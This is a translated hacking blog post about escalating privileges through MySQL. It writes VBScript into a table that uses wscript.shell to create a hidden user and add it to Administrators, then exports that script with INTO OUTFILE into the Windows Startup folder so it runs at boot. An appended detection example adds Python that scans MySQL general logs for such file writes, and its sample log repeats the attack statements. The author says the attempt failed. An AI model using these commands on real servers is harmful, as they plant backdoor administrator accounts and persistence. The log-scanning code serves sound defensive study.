Source:
http://www.jb51.net/hack/32280.html
The commands run were as follows:
mysql> create table a (cmd text);
Query OK, 0 rows affected
mysql> insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );
Query OK, 1 row affected
mysql> insert into a values ("a=wshshell.run (""cmd.exe /c net user coffee y2k10516 /add"",0) " );
Query OK, 1 row affected
mysql> insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators y2k10516 /add"",0) " );
Query OK, 1 row affected
1. Result after running the commands
mysql> select * from a ;
+------------------------------------------------------------------------------+
| cmd |
+------------------------------------------------------------------------------+
| set wshshell=createobject ("wscript.shell" ) |
| a=wshshell.run ("cmd.exe /c net user coffee y2k10516 /add",0) |
| b=wshshell.run ("cmd.exe /c net localgroup Administrators y2k10516 /add",0) |
+------------------------------------------------------------------------------+
3 rows in set
Writing it into the startup folder:
1. select * from libc into outfile "c:\docume~1\alluse~1\「开始」菜单\程序\启动\libc.vbs";
Once the system restarts, the new user exists.
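As an added detection example (not part of the original post), the following Python scans MySQL general query log lines for INTO OUTFILE / INTO DUMPFILE writes and rates a write into a Windows Startup folder, like the one above, as high severity. The log lines are constructed in the layout of MySQL's general_log file, and the secure_file_priv value is an assumed default.

```python
import re

# Constructed sample in the layout of MySQL's general_log file (time, thread id, command, SQL).
# Raw string so the Windows backslashes survive; the second line mirrors the post's statement.
SAMPLE_LOG = r"""
2024-05-01T10:00:01.000000Z     7 Query select * from a
2024-05-01T10:00:02.000000Z     7 Query select * from libc into outfile "c:\docume~1\alluse~1\「开始」菜单\程序\启动\libc.vbs"
2024-05-01T10:00:03.000000Z     8 Query select name into outfile '/var/lib/mysql-files/export.csv' from t
2024-05-01T10:00:04.000000Z     9 Query select 0x4d5a into dumpfile 'C:/ProgramData/Microsoft/Windows/Start Menu/Programs/StartUp/x.vbs'
"""

LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<tid>\d+)\s+Query\s+(?P<sql>.*)$")
# Matches INTO OUTFILE / INTO DUMPFILE and captures the quoted target path.
FILE_WRITE = re.compile(r"""into\s+(?:outfile|dumpfile)\s+(['"])(?P<path>.*?)\1""", re.IGNORECASE)
# Folder names of the Windows Startup folder on English and Chinese installations.
STARTUP_NAMES = {"startup", "启动"}


def classify_path(path, secure_file_priv):
    """Rate a server-side file write by where it lands."""
    parts = [p.lower() for p in re.split(r"[\\/]+", path)]
    if any(p in STARTUP_NAMES for p in parts):
        return "high"    # persistence: the file runs at the next logon/boot
    if secure_file_priv and path.replace("\\", "/").lower().startswith(secure_file_priv.lower()):
        return "low"     # inside the directory that secure_file_priv permits
    return "medium"      # arbitrary write outside the permitted directory


def scan_general_log(text, secure_file_priv="/var/lib/mysql-files"):
    """Return one finding per INTO OUTFILE/DUMPFILE statement found in general-log text."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        w = FILE_WRITE.search(m.group("sql"))
        if w:
            findings.append({"thread": int(m.group("tid")),
                             "path": w.group("path"),
                             "severity": classify_path(w.group("path"), secure_file_priv)})
    return findings


if __name__ == "__main__":
    # On a real server, read the file named by SHOW VARIABLES LIKE 'general_log_file'
    # and pass the value of SHOW VARIABLES LIKE 'secure_file_priv' (empty means unrestricted).
    for finding in scan_general_log(SAMPLE_LOG):
        print(finding)
```

The same classification applies to the FILE privilege review: any account that holds FILE on a server whose secure_file_priv is empty can reach every path the mysqld service account can write.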
I did not manage to escalate privileges. Although I was using the root user, the database probably has a setting that prevents the file-write permission from being used. Some root accounts have the default empty password, so some SQL commands cannot be executed remotely.
Privilege escalation is skilled work; sooner or later I will master this technique!
This article is from the blog "丑小鸭的天空" (The Ugly Duckling's Sky); reposting is not permitted.